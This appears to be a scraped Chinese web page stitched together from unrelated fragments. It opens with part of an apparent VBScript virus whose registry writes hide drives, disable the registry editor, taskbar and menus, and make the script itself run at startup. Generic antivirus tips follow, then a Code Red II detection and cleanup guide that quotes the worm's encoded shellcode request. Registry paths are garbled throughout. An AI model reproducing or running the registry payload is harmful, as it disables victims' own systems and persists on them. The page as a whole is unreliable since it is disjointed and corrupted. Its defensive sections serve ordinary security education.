r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerodrives",63000000,"reg_dword" '修改注册表,隐藏所有逻辑盘符
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciessystemdisableregistrytools",1,"reg_dword" '修改注册表,禁止注册表编辑
r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionunscanregistry","" '修改注册表,禁止开机注册表扫描
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerologoff",1,"reg_dword" '修改注册表,禁止“注销”菜单
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpolicieswinoldapporealmode",1,"reg_dword" '修改注册表,禁止ms-dos实模式
r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionunwin32system","win32system.vbs" '修改注册表,使这个脚本本身开机自动运行
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerodesktop",1,"reg_dword" '修改注册表,禁止显示桌面图标
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpolicieswinoldappdisabled",1,"reg_dword" '修改注册表,禁止纯dos模式
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerosettaskbar",1,"reg_dword" '修改注册表,禁止“任务栏和开始”菜单
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexploreroviewcontextmenu",1,"reg_dword" '修改注册表,禁止右键菜单
浏览量:2
下载量:0
时间:
由于计算机病毒的传播方式多种多样,又通常具有一定的隐蔽性,因此,首先应提高全民对计算机病毒的防范意识,在计算机的使用过程中应注意下几点: (1)尽量不使用盗版或来历不明的软件。 (2)备份硬盘引区和主引导扇区数据,经常对重要的数据进行备份。 (3)养成经常用杀毒软件检查硬盘和每一张外来盘的良好习惯。 (4)杀毒软件应定期升级,一般间隔时间最好不超过一个月。 (5)安装了实时监控防病毒软件,当然这也不是一劳永逸的方法,防病毒软件不一定对所有的病毒都有效,而且病毒的更新速度也很快。 (6)随时注意计算机的各种异常现象,一旦发现,应立即用杀毒软件仔细检查。杀毒软件是预防病毒感染的有效工具,应尽量配备多套杀毒软件,因为每个杀毒软件都有各自的特点。 (7)有些病毒的传播途径主要是通过电子邮件,被称为“邮件病毒”。
怎样简单杀电脑病毒呢?
使用电脑系统浏览网页、下载软件是经常做也是简单的事情,这些细节往往最容易导致电脑系统抵御不住木马的入侵或者遭遇黑客的攻击,此时电脑系统中毒我们可以做什么呢?
第一步,准备一张DOS启动盘(干净的)和DOS下面正常运行的杀软,然后关机进行冷启动。第一点DOS启动盘必须是干净的,第二点杀软中毒后也可能会出现异常情况,因此我们也还需要准备一个能在DOS正常使用的杀软来操作,或者与原来的杀软交叉清理。
第二步、中毒后以最快速度备份或者转移重要文件,防止被木马持续损坏,建议将它们转移备份到别的可移动硬盘或者磁盘上,还有一点不要轻易直接关闭计算,因为一旦损坏严重极可能再次进入计算机比较麻烦。无论文件是否已经中毒应该先备份,最好标记上,清理完所有病毒再来处理也不晚。
第三步、GHOST的备份文件有时候很有用,可以尝试恢复一下系统,当然也是很保险的方法,怎样简单杀电脑病毒但是必须先保证这个备份的安全性。
第四步、上网如果还在继续要立刻断网,尤其注意IE是否经常询问你进行一些操作,包括运行某些不可知的ActiveX控件等等,千万不要乱动,最好直接关闭。
两种上网被入侵特征:
1,浏览恶意代码的网页被恶意篡改,或者格式化磁盘重复某些windows指令,甚至最后导致计算机直接瘫痪。
2,潜在木马或者蠕虫病毒引诱你进行操作,最后直接将电脑系统中毒的病毒逐步扩散。
应对办法:断网是必须的,先避免多重被侵占的可能性,然后先不关闭计算机,继续进行下一步操作。
第五步、重新恢复系统后,一定要修改所有的账户密码,尤其是重要的账户密码,防止被二次侵占丢失重要信息。
浏览量:2
下载量:0
时间:
红色代码病毒,该病毒利用IIS的缓冲区溢出漏洞,通过TCP的80端口传播,并且该病毒变种在感染系统后会释放出黑客程序,下面由读文网小编给你做出详细的介绍!希望对你有帮助!谢谢,欢迎回访!
1、在WINNTSYSTEM32LOGFILESW3SVC1目录下的日志文件中是否含有以下内容
GET,/default.ida,
quduwenquduwenquduwenquduwenquduwenquduwenquduwenX
quduwenquduwenquduwenquduwenquduwenquduwenquduwenquduwenXXXXX
quduwenquduwenquduwenquduwenquduwenquduwenquduwenquduwenXXXXX
quduwenquduwenquduwenquduwenquduwenquduwenquduwenXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
如果发现这些内容,那么该系统已经遭受“红色代码II”的攻击。
2、使用命令netstat –a
如果在1025以上端口出现很多SYN-SENT连接请求,或者1025号以上的大量端口处于Listening状态,那么该系统已经遭受“红色代码II”病毒的感染。
3、如果在以下目录中存在Root.exe文件,说明系统已被感染。
C:inetpubScriptsRoot.exe
D:inetpubScriptsRoot.exe
C:progra~1Common~1SystemMSADCRoot.exe
D:Progra~1Common~1SystemMSADCRoot.exe
同时,“红色代码II”还会释放出以下两个文件C:Explorer.exe or D:Explorer.exe。这两个文件都是木马程序。
4、由于遭受“红色代码II”病毒的攻击,NT服务器中的Web服务和Ftp服务会异常中止。
4解决方案编辑
1、请到以下微软站点下载补丁程序:
http://www.microsoft.com/technet/security/bulletin/MS01-033.asp
2、断掉网络重新启动系统,防止病毒通过网络再次感染。
3、安装微软补丁程序。
4、删除以下病毒释放的木马程序
C:inetpubScriptsRoot.exe
D:inetpubScriptsRoot.exe
C:progra~1Common~1SystemMSADCRoot.exe
D:Progra~1Common~1SystemMSADCRoot.exe
使用以下命令删除以下文件:
ATTRIB C:EXPLORER.EXE -H -A -R
DEL C:EXPLORER.EXE
ATTRIB D:EXPLORER.EXE -H -A -R
DEL D:EXPLORER.EXE
5、将以下键值改为0
HKLMSOFTWAREMicrosoftWindowsNTCurrent VersionWinL
看了此文电脑病毒红色代码介绍
浏览量:3
下载量:0
时间: